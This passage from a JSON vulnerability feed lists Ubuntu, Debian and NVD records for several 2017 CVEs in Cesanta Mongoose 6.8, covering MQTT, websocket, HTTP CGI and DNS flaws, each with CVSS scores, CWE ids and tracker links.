{"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2893", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2893"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2893", "href": "https://ubuntu.com/security/CVE-2017-2893", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T13:55:15", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT\npacket parsing functionality of Cesanta Mongoose 6.8. A specially crafted\nMQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read\npotentially resulting in information disclosure and denial of service. An\nattacker needs to send a specially crafted MQTT packet over the network to\ntrigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2895", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2895"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2895", "href": "https://ubuntu.com/security/CVE-2017-2895", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-08-04T13:55:15", "description": "An exploitable memory corruption vulnerability exists in the Websocket\nprotocol implementation of Cesanta Mongoose 6.8. A specially crafted\nwebsocket packet can cause a buffer to be allocated while leaving stale\npointers which leads to a use-after-free vulnerability which can be\nexploited to achieve remote code execution. An attacker needs to send a\nspecially crafted websocket packet over the network to trigger this\nvulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2922", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2922"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2922", "href": "https://ubuntu.com/security/CVE-2017-2922", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:17", "description": "An exploitable stack buffer overflow vulnerability exists in the MQTT\npacket parsing functionality of Cesanta Mongoose 6.8. A specially crafted\nMQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote\ncode execution. An attacker needs to send a specially crafted MQTT packet\nover the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecastugs:\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2894"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2894", "href": "https://ubuntu.com/security/CVE-2017-2894", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-07-04T06:02:23", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2921", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable use-after-free vulnerability exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2891", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2891", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2891", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2909", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2909", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2909", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an arbitrary out-of-bounds memory read and write potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2892", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2892"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2892", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2892", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2893", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2893"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2893", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2893", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2895", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2895"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2895", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2895", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which leads to a use-after-free vulnerability which can be exploited to achieve remote code execution. An attacker needs to send a specially crafted websocket packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2922", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2922"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2922", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2922", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2894"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2894", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2894", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-06-13T20:35:31", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2921", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2022-06-13T19:16:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2921", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:57", "description": "An exploitable use-after-free vulnerability exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2891", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2891", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2891", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-13T20:35:33", "description": "An infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2909", "cwe": ["CWE-835"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2022-06-13T19:17:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2909", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:56", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an arbitrary out-of-bounds memory read and write potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2892", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2892"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2892", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2892", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:56", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2893", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2893"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2893", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:55", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.2, 